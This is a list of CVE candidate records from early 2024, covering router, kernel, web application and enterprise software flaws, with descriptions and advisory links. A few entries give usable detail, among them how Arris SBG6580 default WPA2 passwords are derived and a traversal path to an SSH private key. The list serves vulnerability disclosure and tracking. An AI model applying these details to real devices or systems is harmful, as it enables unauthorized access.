CVE    2024    25748    Candidate    A Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the fromSetIpMacBind function.    MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/fromSetIpMacBind.md    Assigned (20240212)
CVE    2024    25746    Candidate    Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the add_white_node function.    MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/add_white_node.md    Assigned (20240212)
CVE    2024    25744    Candidate    In the Linux kernel before 6.6.7, an untrusted VMM can trigger int80 syscall handling at any given point. This is related to arch/x86/coco/tdx/tdx.c and arch/x86/mm/mem_encrypt_amd.c.    MISC:https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.7   |   MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b82a8dbd3d2f4563156f7150c6f2ecab6e960b30    Assigned (20240212)
CVE    2024    25741    Candidate    printer_write in drivers/usb/gadget/function/f_printer.c in the Linux kernel through 6.7.4 does not properly call usb_ep_queue, which might allow attackers to cause a denial of service or have unspecified other impact.    MISC:https://www.spinics.net/lists/linux-usb/msg252167.html    Assigned (20240212)
CVE    2024    25740    Candidate    A memory leak flaw was found in the UBI driver in drivers/mtd/ubi/attach.c in the Linux kernel through 6.7.4 for UBI_IOCATT, because kobj->name is not released.    MISC:https://lore.kernel.org/lkml/0171b6cc-95ee-3538-913b-65a391a446b3@huawei.com/T/    Assigned (20240212)
CVE    2024    2574    Candidate    A vulnerability classified as critical was found in SourceCodester Employee Task Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /edit-task.php. The manipulation of the argument task_id leads to authorization bypass. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257077 was assigned to this vulnerability.    MISC:VDB-257077 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257077   |   MISC:VDB-257077 | SourceCodester Employee Task Management System edit-task.php authorization   |   URL:https://vuldb.com/?id.257077   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20edit-task.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20edit-task.php.md    Assigned (20240317)
CVE    2024    25739    Candidate    create_empty_lvol in drivers/mtd/ubi/vtbl.c in the Linux kernel through 6.7.4 can attempt to allocate zero bytes, and crash, because of a missing check for ubi->leb_size.    MISC:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=68a24aba7c593eafa8fd00f2f76407b9b32b47a9   |   MISC:https://groups.google.com/g/syzkaller/c/Xl97YcQA4hg   |   MISC:https://www.spinics.net/lists/kernel/msg5074816.html    Assigned (20240212)
CVE    2024    25731    Candidate    The Elink Smart eSmartCam (com.cn.dq.ipc) application 2.1.5 for Android contains hardcoded AES encryption keys that can be extracted from a binary file. Thus, encryption can be defeated by an attacker who can observe packet data (e.g., over Wi-Fi).    MISC:https://github.com/actuator/com.cn.dq.ipc   |   MISC:https://github.com/actuator/com.cn.dq.ipc/blob/main/CVE-2024-25731    Assigned (20240211)
CVE    2024    25730    Candidate    Hitron CODA-4582 and CODA-4589 devices have default PSKs that are generated from 5-digit hex values concatenated with a "Hitron" substring, resulting in insufficient entropy (only about one million possibilities).    MISC:https://github.com/actuator/cve/blob/main/Hitron/CVE-2024-25730   |   MISC:https://i.ebayimg.com/images/g/I-8AAOSwGE9lsGwI/s-l1600.webp   |   MISC:https://i.ebayimg.com/images/g/MwMAAOSwjTFk3kpd/s-l1600.webp   |   MISC:https://i.ebayimg.com/images/g/VDcAAOSwlodlSuz4/s-l1600.webp   |   MISC:https://i.ebayimg.com/images/g/XaAAAOSwvMNkuESk/s-l1600.webp   |   MISC:https://i.ebayimg.com/images/g/hzUAAOSwUwVllGMZ/s-l1600.webp   |   MISC:https://i.ebayimg.com/images/g/qK8AAOSwbr9lq3PJ/s-l1600.webp    Assigned (20240211)
CVE    2024    2573    Candidate    A vulnerability classified as critical has been found in SourceCodester Employee Task Management System 1.0. Affected is an unknown function of the file /task-info.php. The manipulation leads to execution after redirect. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257076.    MISC:VDB-257076 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257076   |   MISC:VDB-257076 | SourceCodester Employee Task Management System task-info.php redirect   |   URL:https://vuldb.com/?id.257076   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-info.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-info.php.md    Assigned (20240317)
CVE    2024    25729    Candidate    Arris SBG6580 devices have predictable default WPA2 security passwords that could lead to unauthorized remote access. (They use the first 6 characters of the SSID and the last 6 characters of the BSSID, decrementing the last octet.)    MISC:https://github.com/actuator/cve/blob/main/Arris/CVE-2024-25729   |   MISC:https://github.com/actuator/cve/blob/main/Arris/SBG6580.png   |   MISC:https://i.ebayimg.com/images/g/DhoAAOSwx0FbhhcN/s-l1600.jpg   |   MISC:https://i.ebayimg.com/images/g/z2oAAOSwO1pbQ9BS/s-l1600.jpg    Assigned (20240211)
CVE    2024    25728    Candidate    ExpressVPN before 12.73.0 on Windows, when split tunneling is used, sends DNS requests according to the Windows configuration (e.g., sends them to DNS servers operated by the user's ISP instead of to the ExpressVPN DNS servers), which may allow remote attackers to obtain sensitive information about websites visited by VPN users.    MISC:https://www.bleepingcomputer.com/news/security/expressvpn-bug-has-been-leaking-some-dns-requests-for-years/   |   MISC:https://www.expressvpn.com/blog/windows-app-dns-requests/    Assigned (20240211)
CVE    2024    25723    Candidate    ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2.    CONFIRM:https://github.com/zenml-io/zenml/compare/0.42.1...0.42.2   |   CONFIRM:https://github.com/zenml-io/zenml/compare/0.43.0...0.43.1   |   CONFIRM:https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4   |   CONFIRM:https://www.zenml.io/blog/critical-security-update-for-zenml-users   |   MISC:https://github.com/zenml-io/zenml    Assigned (20240211)
CVE    2024    25722    Candidate    qanything_kernel/connector/database/mysql/mysql_client.py in qanything.ai QAnything before 1.2.0 allows SQL Injection.    MISC:https://github.com/netease-youdao/QAnything/commit/35753b892c2c4361b318d68dfa3e251c85ce889c   |   MISC:https://github.com/netease-youdao/QAnything/compare/v1.1.1...v1.2.0    Assigned (20240211)
CVE    2024    2572    Candidate    A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /task-details.php. The manipulation leads to execution after redirect. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257075.    MISC:VDB-257075 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257075   |   MISC:VDB-257075 | SourceCodester Employee Task Management System task-details.php redirect   |   URL:https://vuldb.com/?id.257075   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-details.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-details.php.md    Assigned (20240317)
CVE    2024    25718    Candidate    In the Samly package before 1.4.0 for Elixir, Samly.State.Store.get_assertion/3 can return an expired session, which interferes with access control because Samly.AuthHandler uses a cached session and does not replace it, even after expiry.    MISC:https://diff.hex.pm/diff/samly/1.3.0..1.4.0   |   MISC:https://github.com/dropbox/samly   |   MISC:https://github.com/dropbox/samly/pull/13   |   MISC:https://github.com/dropbox/samly/pull/13/commits/812b5c3ad076dc9c9334c1a560c8e6470607d1eb   |   MISC:https://github.com/handnot2/samly   |   MISC:https://hex.pm/packages/samly    Assigned (20240211)
CVE    2024    25715    Candidate    Glewlwyd SSO server 2.x through 2.7.6 allows open redirection via redirect_uri.    MISC:https://github.com/babelouest/glewlwyd/commit/59239381a88c505ab38fe64fdd92f846defa5754   |   MISC:https://github.com/babelouest/glewlwyd/commit/c91c0155f2393274cc18efe77e06c6846e404c75    Assigned (20240211)
CVE    2024    25714    Candidate    In Rhonabwy through 1.1.13, HMAC signature verification uses a strcmp function that is vulnerable to side-channel attacks, because it stops the comparison when the first difference is spotted in the two signatures. (The fix uses gnutls_memcmp, which has constant-time execution.)    MISC:https://github.com/babelouest/rhonabwy/commit/f9fd9a1c77e48b514ebb3baf0360f87eef3d846e    Assigned (20240211)
CVE    2024    25713    Candidate    yyjson through 0.8.0 has a double free, leading to remote code execution in some cases, because the pool_free function lacks loop checks. (pool_free is part of the pool series allocator, along with pool_malloc and pool_realloc.)    MISC:https://github.com/ibireme/yyjson/security/advisories/GHSA-q4m7-9pcm-fpxh    Assigned (20240211)
CVE    2024    25712    Candidate    http-swagger before 1.2.6 allows XSS via PUT requests, because a file that has been uploaded (via httpSwagger.WrapHandler and *webdav.memFile) can subsequently be accessed via a GET request. NOTE: this is independently fixable with respect to CVE-2022-24863, because (if a solution continued to allow PUT requests) large files could have been blocked without blocking JavaScript, or JavaScript could have been blocked without blocking large files.    MISC:https://cosmosofcyberspace.github.io/improper_http_method_leads_to_xss/poc.html   |   MISC:https://github.com/swaggo/http-swagger/releases/tag/v1.2.6    Assigned (20240211)
CVE    2024    25711    Candidate    diffoscope before 256 allows directory traversal via an embedded filename in a GPG file. Contents of any file, such as ../.ssh/id_rsa, may be disclosed to an attacker. This occurs because the value of the gpg --use-embedded-filenames option is trusted.    FEDORA:FEDORA-2024-3383326db4   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OUNBANAWD6TZH2NRRV4YUIAXEHLUJQ47/   |   MISC:https://salsa.debian.org/reproducible-builds/diffoscope/-/commit/dfed769904c27d66a14a5903823d9c8c5aae860e   |   MISC:https://salsa.debian.org/reproducible-builds/diffoscope/-/issues/361    Assigned (20240211)
CVE    2024    25710    Candidate    Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.3 through 1.25.0. Users are recommended to upgrade to version 1.26.0 which fixes the issue.    CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0010/   |   MISC:https://lists.apache.org/thread/cz8qkcwphy4cx8gltn932ln51cbtq6kf   |   URL:https://lists.apache.org/thread/cz8qkcwphy4cx8gltn932ln51cbtq6kf   |   MLIST:[oss-security] 20240219 CVE-2024-25710: Apache Commons Compress: Denial of service caused by an infinite loop for a corrupted DUMP file   |   URL:http://www.openwall.com/lists/oss-security/2024/02/19/1    Assigned (20240210)
CVE    2024    2571    Candidate    A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /manage-admin.php. The manipulation leads to execution after redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257074 is the identifier assigned to this vulnerability.    MISC:VDB-257074 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257074   |   MISC:VDB-257074 | SourceCodester Employee Task Management System manage-admin.php redirect   |   URL:https://vuldb.com/?id.257074   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20manage-admin.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20manage-admin.php.md    Assigned (20240317)
CVE    2024    2570    Candidate    A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file /edit-task.php. The manipulation leads to execution after redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257073 was assigned to this vulnerability.    MISC:VDB-257073 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257073   |   MISC:VDB-257073 | SourceCodester Employee Task Management System edit-task.php redirect   |   URL:https://vuldb.com/?id.257073   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20edit-task.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20edit-task.php.md    Assigned (20240317)
CVE    2024    2569    Candidate    A vulnerability was found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin-manage-user.php. The manipulation leads to execution after redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257072.    MISC:VDB-257072 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257072   |   MISC:VDB-257072 | SourceCodester Employee Task Management System admin-manage-user.php redirect   |   URL:https://vuldb.com/?id.257072   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20admin-manage-user.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20admin-manage-user.php.md    Assigned (20240317)
CVE    2024    2568    Candidate    A vulnerability has been found in heyewei JFinalCMS 5.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/div_data/delete?divId=9 of the component Custom Data Page. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257071.    MISC:VDB-257071 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257071   |   MISC:VDB-257071 | heyewei JFinalCMS Custom Data Page sql injection   |   URL:https://vuldb.com/?id.257071   |   MISC:https://github.com/bigbigbigbaby/cms/blob/main/5.md   |   URL:https://github.com/bigbigbigbaby/cms/blob/main/5.md    Assigned (20240317)
CVE    2024    25679    Candidate    In PQUIC before 5bde5bb, retention of unused initial encryption keys allows attackers to disrupt a connection with a PSK configuration by sending a CONNECTION_CLOSE frame that is encrypted via the initial key computed. Network traffic sniffing is needed as part of exploitation.    MISC:https://github.com/p-quic/pquic/issues/35   |   MISC:https://github.com/p-quic/pquic/pull/39   |   MISC:https://www.rfc-editor.org/rfc/rfc9001#name-discarding-unused-keys    Assigned (20240209)
CVE    2024    25678    Candidate    In LiteSpeed QUIC (LSQUIC) Library before 4.0.4, DCID validation is mishandled.    MISC:https://github.com/litespeedtech/lsquic/commit/515f453556c99d27c4dddb5424898dc1a5537708   |   MISC:https://github.com/litespeedtech/lsquic/releases/tag/v4.0.4   |   MISC:https://www.rfc-editor.org/rfc/rfc9001    Assigned (20240209)
CVE    2024    25677    Candidate    In Min before 1.31.0, local files are not correctly treated as unique security origins, which allows them to improperly request cross-origin resources. For example, a local file may request other local files through an XML document.    MISC:https://github.com/minbrowser/min/security/advisories/GHSA-4w9v-7h8h-rv8x    Assigned (20240209)
CVE    2024    25675    Candidate    An issue was discovered in MISP before 2.4.184. A client does not need to use POST to start an export generation process. This is related to app/Controller/JobsController.php and app/View/Events/export.ctp.    MISC:https://github.com/MISP/MISP/commit/0ac2468c2896f4be4ef9219cfe02bff164411594   |   MISC:https://github.com/MISP/MISP/compare/v2.4.183...v2.4.184    Assigned (20240209)
CVE    2024    25674    Candidate    An issue was discovered in MISP before 2.4.184. Organisation logo upload is insecure because of a lack of checks for the file extension and MIME type.    MISC:https://github.com/MISP/MISP/commit/312d2d5422235235ddd211dcb6bb5bb09c07791f   |   MISC:https://github.com/MISP/MISP/compare/v2.4.183...v2.4.184    Assigned (20240209)
CVE    2024    2567    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in jurecapuder AndroidWeatherApp 1.0.0 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. VDB-257070 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The code maintainer was contacted early about this disclosure but did not respond in any way. Instead the GitHub repository got deleted after a few days. We have to assume that the product is not supported anymore.    MISC:VDB-257070 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257070   |   MISC:VDB-257070 | jurecapuder AndroidWeatherApp Backup File androidmanifest.xml backup   |   URL:https://vuldb.com/?id.257070   |   MISC:https://github.com/ctflearner/Android_Findings/blob/main/AndroidWeatherApp/Android_backup.md   |   URL:https://github.com/ctflearner/Android_Findings/blob/main/AndroidWeatherApp/Android_backup.md    Assigned (20240317)
CVE    2024    2566    Candidate    A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240313. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file api/client/get_extension_yl.php. The manipulation of the argument imei leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257065 was assigned to this vulnerability.    MISC:VDB-257065 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257065   |   MISC:VDB-257065 | Fujian Kelixin Communication Command and Dispatch Platform get_extension_yl.php sql injection   |   URL:https://vuldb.com/?id.257065   |   MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-get_extension_yl.pdf   |   URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-get_extension_yl.pdf    Assigned (20240316)
CVE    2024    25657    Candidate    An open redirect in the Login/Logout functionality of web management in AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS could allow attackers to redirect authenticated users to malicious websites.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25657    Assigned (20240209)
CVE    2024    25656    Candidate    Improper input validation in AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS can result in unauthenticated CPE (Customer Premises Equipment) devices storing arbitrarily large amounts of data during registration. This can potentially lead to DDoS attacks on the application database and, ultimately, affect the entire product.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25656    Assigned (20240209)
CVE    2024    25655    Candidate    Insecure storage of LDAP passwords in the authentication functionality of AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS allows members (with read access to the application database) to decrypt the LDAP passwords of users who successfully authenticate to web management via LDAP.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25655    Assigned (20240209)
CVE    2024    25654    Candidate    Insecure permissions for log files of AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS allow members (with local access to the UMP application server) to access credentials to authenticate to all services, and to decrypt sensitive data stored in the database.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25654    Assigned (20240209)
CVE    2024    25653    Candidate    Broken Access Control in the Report functionality of Delinea PAM Secret Server 11.4 allows unprivileged users, when Unlimited Admin Mode is enabled, to view system reports and modify custom reports via the Report functionality in the Web UI.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25653    Assigned (20240209)
CVE    2024    25652    Candidate    In Delinea PAM Secret Server 11.4, it is possible for a user (with access to the Report functionality) to gain unauthorized access to remote sessions created by legitimate users.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25652    Assigned (20240209)
CVE    2024    25651    Candidate    User enumeration can occur in the Authentication REST API in Delinea PAM Secret Server 11.4. This allows a remote attacker to determine whether a user is valid because of a difference in responses from the /oauth2/token endpoint.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25651    Assigned (20240209)
CVE    2024    25650    Candidate    Insecure key exchange between Delinea PAM Secret Server 11.4 and the Distributed Engine 8.4.3 allows a PAM administrator to obtain the Symmetric Key (used to encrypt RabbitMQ messages) via crafted payloads to the /pre-authenticate, /authenticate, and /execute-and-respond REST API endpoints. This makes it possible for a PAM administrator to impersonate the Engine and exfiltrate sensitive information from the messages published in the RabbitMQ exchanges, without being audited in the application.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25650    Assigned (20240209)
CVE    2024    2565    Candidate    A vulnerability was found in PandaXGO PandaX up to 20240310. It has been classified as critical. Affected is an unknown function of the file /apps/system/router/upload.go of the component File Extension Handler. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257064.    MISC:VDB-257064 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257064   |   MISC:VDB-257064 | PandaXGO PandaX File Extension upload.go unrestricted upload   |   URL:https://vuldb.com/?id.257064   |   MISC:https://github.com/PandaXGO/PandaX/issues/5   |   URL:https://github.com/PandaXGO/PandaX/issues/5    Assigned (20240316)
CVE    2024    25649    Candidate    In Delinea PAM Secret Server 11.4, it is possible for an attacker (with Administrator access to the Secret Server machine) to read the following data from a memory dump: the decrypted master key, database credentials (when SQL Server Authentication is enabled), the encryption key of RabbitMQ queue messages, and session cookies.    MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25649    Assigned (20240209)
CVE    2024    25645    Candidate    Under certain conditions, SAP NetWeaver (Enterprise Portal) - version 7.50 allows an attacker to access information which would otherwise be restricted, causing low impact on confidentiality of the application and no impact on Integrity and Availability of the application.    MISC:https://me.sap.com/notes/3428847   |   URL:https://me.sap.com/notes/3428847   |   MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364   |   URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364    Assigned (20240209)
CVE    2024    25644    Candidate    Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.    MISC:https://me.sap.com/notes/3425682   |   URL:https://me.sap.com/notes/3425682   |   MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364   |   URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364    Assigned (20240209)
CVE    2024    25643    Candidate    The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. There is no impact on integrity and availability.    MISC:https://me.sap.com/notes/3237638   |   URL:https://me.sap.com/notes/3237638   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240209)
CVE    2024    25642    Candidate    Due to improper certificate validation in SAP Cloud Connector - version 2.0, an attacker can impersonate genuine servers to interact with SCC, breaking the mutual authentication. Hence, the attacker can intercept the request to view/modify sensitive information. There is no impact on the availability of the system.    MISC:https://me.sap.com/notes/3424610   |   URL:https://me.sap.com/notes/3424610   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240209)
CVE    2024    25640    Candidate    Iris is a web collaborative platform that helps incident responders share technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.4.0. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker needs to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.4.0 of iris-web. No workarounds are available.    MISC:https://github.com/dfir-iris/iris-web/security/advisories/GHSA-2xq6-qc74-w5vp   |   URL:https://github.com/dfir-iris/iris-web/security/advisories/GHSA-2xq6-qc74-w5vp    Assigned (20240208)
CVE    2024    2564    Candidate    A vulnerability was found in PandaXGO PandaX up to 20240310 and classified as critical. This issue affects the function ExportUser of the file /apps/system/api/user.go. The manipulation of the argument filename leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257063.    MISC:VDB-257063 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257063   |   MISC:VDB-257063 | PandaXGO PandaX user.go ExportUser path traversal   |   URL:https://vuldb.com/?id.257063   |   MISC:https://github.com/PandaXGO/PandaX/issues/6   |   URL:https://github.com/PandaXGO/PandaX/issues/6    Assigned (20240316)
CVE    2024    25636    Candidate    Misskey is an open source, decentralized social media platform with ActivityPub support. Prior to version 2024.2.0, when fetching remote Activity Streams objects, Misskey doesn't check that the response from the remote server has a `Content-Type` header value of the Activity Streams media type, which allows a threat actor to upload a crafted Activity Streams document to a remote server and make a Misskey instance fetch it, if the remote server accepts arbitrary user uploads. The vulnerability allows a threat actor to impersonate and take over an account on a remote server that satisfies all of the following properties: allows the threat actor to register an account; accepts arbitrary user-uploaded documents and places them on the same domain as legitimate Activity Streams actors; and serves user-uploaded document in response to requests with an `Accept` header value of the Activity Streams media type. Version 2024.2.0 contains a patch for the issue.    MISC:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/ApResolverService.ts#L69-L119   |   URL:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/ApResolverService.ts#L69-L119   |   MISC:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/models/ApNoteService.ts#L112-L308   |   URL:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/models/ApNoteService.ts#L112-L308   |   MISC:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/server/api/endpoints/ap/show.ts#L125-L143   |   URL:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/server/api/endpoints/ap/show.ts#L125-L143   |   MISC:https://github.com/misskey-dev/misskey/commit/9a70ce8f5ea9df00001894809f5ce7bc69b14c8a   |   URL:https://github.com/misskey-dev/misskey/commit/9a70ce8f5ea9df00001894809f5ce7bc69b14c8a   |   MISC:https://github.com/misskey-dev/misskey/security/advisories/GHSA-qqrm-9grj-6v32   |   URL:https://github.com/misskey-dev/misskey/security/advisories/GHSA-qqrm-9grj-6v32    Assigned (20240208)
CVE    2024    25635    Candidate    alf.io is an open source ticket reservation system. Prior to version 2.0-Mr-2402, organization owners can view the generated API KEY and USERS of other organization owners using the `http://192.168.26.128:8080/admin/api/users/<user_id>` endpoint, which exposes the details of the provided user ID. This may also expose the API KEY in the username of the user. Version 2.0-M4-2402 fixes this issue.    MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-ffr5-g3qg-gp4f   |   URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-ffr5-g3qg-gp4f    Assigned (20240208)
CVE    2024    25634    Candidate    alf.io is an open source ticket reservation system. Prior to version 2.0-Mr-2402, an attacker can access data from other organizers. The attacker can use a specially crafted request to receive the e-mail log sent by other events. Version 2.0-M4-2402 fixes this issue.    MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-5wcv-pjc6-mxvv   |   URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-5wcv-pjc6-mxvv    Assigned (20240208)
CVE    2024    25631    Candidate    Cilium is a networking, observability, and security solution with an eBPF-based dataplane. For Cilium users who have enabled an external kvstore and Wireguard transparent encryption, traffic between pods in the affected cluster is not encrypted. This issue affects Cilium v1.14 before v1.14.7 and has been patched in Cilium v1.14.7. There is no workaround to this issue.    MISC:https://docs.cilium.io/en/stable/installation/k8s-install-external-etcd/#when-do-i-need-to-use-a-kvstore   |   URL:https://docs.cilium.io/en/stable/installation/k8s-install-external-etcd/#when-do-i-need-to-use-a-kvstore   |   MISC:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg   |   URL:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.14.7   |   URL:https://github.com/cilium/cilium/releases/tag/v1.14.7   |   MISC:https://github.com/cilium/cilium/security/advisories/GHSA-x989-52fc-4vr4   |   URL:https://github.com/cilium/cilium/security/advisories/GHSA-x989-52fc-4vr4    Assigned (20240208)
